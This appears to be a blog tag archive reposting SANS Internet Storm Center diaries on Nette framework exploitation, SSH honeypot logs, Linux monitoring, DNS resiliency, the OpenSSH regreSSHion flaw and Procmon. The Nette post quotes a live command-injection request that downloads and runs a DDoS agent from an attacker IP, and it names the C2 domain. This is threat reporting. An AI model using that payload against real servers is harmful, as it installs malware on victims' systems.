Tag Archives: SANS

Security

Attacks against the "Nette" PHP framework CVE-2020-15227, (Fri, Jul 12th)

Leave a comment
This post was originally published on this site

Today, I noticed some exploit attempts against an older vulnerability in the "Nette Framework", CVE-2020-15227 [1].

Nette is a PHP framework that simplifies the development of web applications in PHP. In 2020, an OS command injection vulnerability was found and patched in Nette. As so often with OS command injection, exploitation was rather straightforward. An exploit was released soon after.

Today, I noticed yet another variation of an exploit vor CVE-2020-15227:

 /nette.micro/?callback=shell_exec&cmd=cd%20/tmp;wget%20http://199.204.98.254/ohshit.sh;chmod%20777%20ohshit.sh;./ohshit.sh

Even though the exploit is old, and the line above loads a simple DDoS agent, the agent itself has not been uploaded to Virustotal yet [2]. 

The malware was written in Go, and Virustotal's "Behaviour" analysis does a pretty good job in summarizing the binary.

  • The binary uses crontab and systemd for persistence.
  • it uses sosbot.icu on port 1314 for command and control
  •  

[1] https://github.com/nette/application/security/advisories/GHSA-8gv3-3j7f-wg94
[2] https://www.virustotal.com/gui/file/8325bfc699f899d0190e36ea339540ea0590aea0e1b22b8a2dcec3ff8b5763b8


Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Security

Understanding SSH Honeypot Logs: Attackers Fingerprinting Honeypots, (Thu, Jul 11th)

Leave a comment
This post was originally published on this site

Some of the commands observed can be confusing for a novice looking at ssh honeypot logs. Sure, you have some obvious commands like "uname -a" to fingerprint the kernel. However, other commands are less intuitive and are not commands a normal user would use. I am trying to summarize some of the more common ones here, focusing on commands attackers use to figure out if they are inside a honeypot.

Security

Kunai: Keep an Eye on your Linux Hosts Activity, (Mon, Jul 8th)

Leave a comment
This post was originally published on this site

Microsoft has a very popular tool (part of the SysInternals) called Sysmon[1]. It is a system service and device driver designed to monitor and log system activity, including very useful events like process creations, network connections, DNS requests, file changes, and more. This tool is deployed by many organizations because it’s a great companion to expand the visibility of your Windows environments. Many SOCs rely on it to perform investigations and hunting.

Security

Overlooked Domain Name Resiliency Issues: Registrar Communications, (Fri, Jul 5th)

Leave a comment
This post was originally published on this site

I often think the Internet would work better without DNS. People unable to remember an IP address would be unable to use it. But on the other hand, there is more to DNS than translating a human-readable hostname to a "machine-readable" IP address. DNS does allow us to use consistent labels even as the IP address changes.

Security

SSH "regreSSHion" Remote Code Execution Vulnerability in OpenSSH., (Mon, Jul 1st)

Leave a comment
This post was originally published on this site

Qualys published a blog posts with details regarding a critical remote code execution vulnerability [1]

This week is far from ideal to have to deal with a critical vulnerability in widely used software like OpenSSH. So I want to save you some time by summarizing the most important points in a very brief post:

  • The CVEs associated with this vulnerability are CVE-2006-5051 and CVE-2024-6387,
  • The reason for the two CVE numbers and the use of the old 2006 CVE number is that this is a regression. An old vulnerability that came back. Sadly, this happens somewhat regularly (not with OpenSSH, but software in general) if developers do not add tests to ensure the vulnerability is patched in future versions. Missing comments are another reason for these regressions. A developer may remove a test they consider unnecessary. 
  • The vulnerability does allow arbitrary remote code execution without authentication.
  • OpenSSH versions up to 4.4p1 are vulnerable to CVE-2006-5051
  • OpenSSH versions from 8.5p1 to 9.8p1 (this is the version patched version)
  • Remember that many Linux distributions will not increase version numbers if they are backporting a patch
  • This is a timing issue, and exploitation is not easily reproducible but takes about 10,000 attempts on x86 (32-bit).
  • This speed of exploitation is limited by the MaxStartups and LoginGraceTime.
  • Exploitation for AMD64 appears to be not practical at this time.

Most Linux systems are currently running on 64-bit architectures. However, this could be a big deal for legacy systems / IoT systems in particular if no more patches are available. Limiting the rate of new connections using a network firewall may make exploitation less likely in these cases. First of all, a patch should be applied. But if no patch is available, port knocking, moving the server to an odd port or allowlisting specific IPs may be an option.

 

[1] https://blog.qualys.com/vulnerabilities-threat-research/2024/07/01/regresshion-remote-unauthenticated-code-execution-vulnerability-in-openssh-server


Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Security

Sysinternals' Process Monitor Version 4 Released, (Sat, Jun 22nd)

Leave a comment
This post was originally published on this site

Version 4.01 of Sysinternals' Process Monitor (procmon) was released (just one day after the release of version 4.0).

These releases bring improvements to performance and the user interface.

And a new event for the Process start was added.

This can now be displayed as a column:

And it can also be used as a filter, for example to filter out all process that started before the new process you want to analyze:

Didier Stevens
Senior handler
blog.DidierStevens.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.